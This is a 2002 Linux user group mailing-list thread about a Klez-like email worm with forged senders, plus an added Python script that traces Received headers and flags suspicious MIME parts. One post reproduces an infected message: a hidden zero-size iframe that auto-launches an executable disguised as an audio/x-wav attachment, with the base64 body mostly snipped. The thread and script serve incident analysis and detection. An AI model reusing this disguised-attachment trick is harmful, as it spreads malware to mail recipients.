[lug] Someone on this list likely has a windows virus

Paul Bille Paul at ebille.cudenver.edu
Mon Apr 29 12:57:27 MDT 2002


> I am wondering how many people here have received messages

Hello Dan,

I remember seeing something like "Look,my beautiful girl friend" recently.
I think it was on either this or one of the other mail lists I monitor,
freeBSD.org or CLUE.  I deleted it without looking at it so I can't say much
about it.

There is a note on the FreeBSD list at the moment, received 4/28/2002 9:09pm
my time from asayon, "Re:look, my beutiful girl friend":
YOUR MAIL HAD THE VIRUS Exploit-MIME.gen AND COULD NOT BE CLEANED.
Return-Path: <owner-freebsd-questions at FreeBSD.ORG>
Received: from tg2.sharp.co.jp (tg2.sharp.co.jp [211.4.241.20])
	by hub.freebsd.org (Postfix) with ESMTP id 7109B37B405
	for <questions at FreeBSD.org>; Sun, 28 Apr 2002 20:10:57 -0700 (PDT)

Please keep us on the list posted with your findings.

Thanks,

Paul
http://bille.cudenver.edu/author



-----Original Message-----
From: lug-admin at lug.boulder.co.us [mailto:lug-admin at lug.boulder.co.us]On
Behalf Of D. Stimits
Sent: Monday, April 29, 2002 12:29 PM
To: BLUG
Subject: [lug] Someone on this list likely has a windows virus


Either someone on this list has a windows virus, or else this list is
being targeted. Tkil noticed someone sent one of the recent windows
viruses with the header forged to look like me. I just got one forged to
look like Alan Robertson. I have also received several of what I think
are the Klez virus from non-BLUG sources; the epidemic seems to have started
again. But since this virus goes after everyone in the address book, and
probably everyone new mail arrives from, and since my name was forged
into Tkil's email, and Alan Robertson's was forged into one sent to me,
all within the last few days, it makes sense. One thing that is in
common to every one of these is verizon.net in the return path. Verizon
is the common theme in the ones reaching me, regardless of whether it is
forged to look like someone from BLUG or from someone I don't recognize.
In tracing the actual dotted decimal address from the header of email
forging Alan Robertson's name, I found the real source was owned by what
looks like a Brazil domain, though I'm not positive (and I have recently
sent spam reports to spamcop about Brazilian unsolicited spam, some Mac
advertisement I think, but I don't speak the language). Anyway, I am
wondering how many people here have received messages which use the name
of someone from the BLUG list, besides me and tkil? How many have
recently received email which has a stupid subject like the one from the
most recent for me, "Look,my beautiful girl friend"? Below I'm going to
mouse paste the header and the virus indicator part; maybe someone can
get an idea. I'd also like to figure out who to complain to at
150.162.47.13. I'll be sending an email to verizon as well, since they
seem to be targeted to take the blame. Anyway, info follows below. Hope
it doesn't false trigger someone's virus software (though I can't
imagine a lot of people here are using windows, and even if they are,
most will use antivirus with it).

D. Stimits, stimits at idcomm.com

Return-Path: <alanr at verizon.net>
Received: from brainstem.idcomm.com (brainstem.idcomm.com
[207.40.196.12])
        by mailhost.idcomm.com (8.10.2/8.10.0) with ESMTP id
g3TEEE932388
        for <stimits at idcomm.com>; Mon, 29 Apr 2002 08:14:14 -0600
Received: from out006.verizon.net (out006pub.verizon.net
[206.46.170.106])
        by brainstem.idcomm.com (8.11.6/8.11.6) with ESMTP id
g3TE71Q27056
        for <stimits at idcomm.com>; Mon, 29 Apr 2002 08:07:04 -0600
X-Spam-Filter: check_local at brainstem.idcomm.com by digitalanswers.org
Received: from Lfuoq ([150.162.47.13]) by out006.verizon.net
          (InterMail vM.5.01.04.05 201-253-122-122-105-20011231) with
SMTP
          id <20020429140914.CVEK2106.out006.verizon.net at Lfuoq>
          for <stimits at idcomm.com>; Mon, 29 Apr 2002 09:09:14 -0500
From: alanr <alanr at suse.com>
To: stimits at idcomm.com
Subject: Look,my beautiful girl friend
MIME-Version: 1.0
Content-Type: multipart/alternative;
        boundary=Fw1U6gp28173p81vhoFB58Zw5RQu6JB84Kp
Message-Id: <20020429140914.CVEK2106.out006.verizon.net at Lfuoq>
Date: Mon, 29 Apr 2002 09:09:19 -0500
X-Mozilla-Status: 8001
X-Mozilla-Status2: 00000000
X-UIDL: _J6H.2UVz8.mailhost

--Fw1U6gp28173p81vhoFB58Zw5RQu6JB84Kp
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY>
<iframe src=3Dcid:Cq2e2IcsWGC2q height=3D0 width=3D0>
</iframe>
<FONT></FONT></BODY></HTML>

--Fw1U6gp28173p81vhoFB58Zw5RQu6JB84Kp
Content-Type: audio/x-wav;
        name=target.bat
Content-Transfer-Encoding: base64
Content-ID: <Cq2e2IcsWGC2q>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4g

...snip...this is the executable in base64 encoding...

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=9
--Fw1U6gp28173p81vhoFB58Zw5RQu6JB84Kp

Content-Type: application/octet-stream;
        name=site=uolbr&size=popup&page=0&stat=corposaude[1].htm
Content-Transfer-Encoding: base64
Content-ID: <Cq2e2IcsWGC2q>
--Fw1U6gp28173p81vhoFB58Zw5RQu6JB84Kp--
_______________________________________________
Web Page:  http://lug.boulder.co.us
Mailing List: http://lists.lug.boulder.co.us/mailman/listinfo/lug
Join us on IRC: lug.boulder.co.us port=6667 channel=#colug
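As an added example (not part of the thread, and not code posted by anyone on it), here is a Python script that does by machine the two things the post above does by hand: walk the Received chain back to the hop that first handed the message in, and flag the MIME trick in the pasted message, namely an executable body carrying a `.bat` name under an `audio/x-wav` content type and pulled in through a zero-size `<iframe src=cid:...>`. It also reports the envelope-sender versus From mismatch the post notices. The sample message is constructed from the headers shown in the post, with real `@` signs in place of the archive's " at " obfuscation, the text/html part's trailing semicolon dropped, and the base64 body cut to its first line; all function names are my own.

```python
import email
import email.utils
import re
from email import policy

# Constructed sample, modelled on the headers and MIME layout pasted in the
# post above. Only the first base64 line of the attachment is kept; it is
# enough to show the "MZ" executable magic once decoded.
SAMPLE = """\
Return-Path: <alanr@verizon.net>
Received: from brainstem.idcomm.com (brainstem.idcomm.com [207.40.196.12])
        by mailhost.idcomm.com (8.10.2/8.10.0) with ESMTP id g3TEEE932388
        for <stimits@idcomm.com>; Mon, 29 Apr 2002 08:14:14 -0600
Received: from out006.verizon.net (out006pub.verizon.net [206.46.170.106])
        by brainstem.idcomm.com (8.11.6/8.11.6) with ESMTP id g3TE71Q27056
        for <stimits@idcomm.com>; Mon, 29 Apr 2002 08:07:04 -0600
Received: from Lfuoq ([150.162.47.13]) by out006.verizon.net
          (InterMail vM.5.01.04.05 201-253-122-122-105-20011231) with SMTP
          id <20020429140914.CVEK2106.out006.verizon.net@Lfuoq>
          for <stimits@idcomm.com>; Mon, 29 Apr 2002 09:09:14 -0500
From: alanr <alanr@suse.com>
To: stimits@idcomm.com
Subject: Look,my beautiful girl friend
MIME-Version: 1.0
Content-Type: multipart/alternative;
        boundary=Fw1U6gp28173p81vhoFB58Zw5RQu6JB84Kp

--Fw1U6gp28173p81vhoFB58Zw5RQu6JB84Kp
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY>
<iframe src=3Dcid:Cq2e2IcsWGC2q height=3D0 width=3D0>
</iframe>
<FONT></FONT></BODY></HTML>

--Fw1U6gp28173p81vhoFB58Zw5RQu6JB84Kp
Content-Type: audio/x-wav;
        name=target.bat
Content-Transfer-Encoding: base64
Content-ID: <Cq2e2IcsWGC2q>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
--Fw1U6gp28173p81vhoFB58Zw5RQu6JB84Kp--
"""

# "from <helo-name> ... [<ip>] ... by <receiving-host>" inside one Received header
HOP_RE = re.compile(r"from (\S+) .*?\[(\d+\.\d+\.\d+\.\d+)\].*? by (\S+)")
RISKY_NAMES = (".bat", ".exe", ".pif", ".scr", ".com", ".vbs")


def received_chain(msg):
    """Hops as dicts {helo, ip, by}, oldest first.  Each MTA prepends its own
    Received header, so the last header in the block is the earliest hop."""
    hops = []
    for value in msg.get_all("Received", []):
        flat = " ".join(value.split())  # unfold continuation lines
        m = HOP_RE.search(flat)
        if m:
            hops.append({"helo": m.group(1), "ip": m.group(2), "by": m.group(3)})
    return list(reversed(hops))


def origin_ip(msg):
    """The address that handed the message to the first trusted relay; the
    HELO name next to it (here 'Lfuoq') is attacker-supplied and meaningless."""
    chain = received_chain(msg)
    return chain[0]["ip"] if chain else None


def sender_mismatch(msg):
    """(return-path domain, From domain) when they differ, else None."""
    rp = email.utils.parseaddr(msg.get("Return-Path", ""))[1]
    frm = email.utils.parseaddr(msg.get("From", ""))[1]
    rpd, fd = rp.rpartition("@")[2].lower(), frm.rpartition("@")[2].lower()
    return (rpd, fd) if rpd != fd else None


def suspicious_parts(msg):
    """Findings as (kind, content-type, filename) for each non-multipart part."""
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        ctype = part.get_content_type()
        name = part.get_filename() or ""
        body = part.get_payload(decode=True) or b""
        # zero-size iframe pulling a cid: part is the auto-launch trick
        if ctype == "text/html" and re.search(
                r"<iframe[^>]*src=[\"']?cid:", body.decode("latin-1"), re.I):
            findings.append(("hidden-cid-iframe", ctype, name))
        # declared type says audio/image, filename says script/executable
        if name.lower().endswith(RISKY_NAMES) and not ctype.startswith("application/"):
            findings.append(("type-name-mismatch", ctype, name))
        # decoded bytes are a DOS/PE executable regardless of what the headers claim
        if body[:2] == b"MZ" and not ctype.startswith("application/"):
            findings.append(("executable-magic", ctype, name))
    return findings


def analyze(raw):
    msg = email.message_from_string(raw, policy=policy.default)
    return {"origin_ip": origin_ip(msg), "chain": received_chain(msg),
            "sender_mismatch": sender_mismatch(msg), "parts": suspicious_parts(msg)}


if __name__ == "__main__":
    for key, val in analyze(SAMPLE).items():
        print(f"{key}: {val}")
```

Only the hop recorded by a relay you trust (here the verizon.net server's own Received line) is evidence; anything earlier can be forged, which is why the script reports the IP from that line rather than the HELO name beside it.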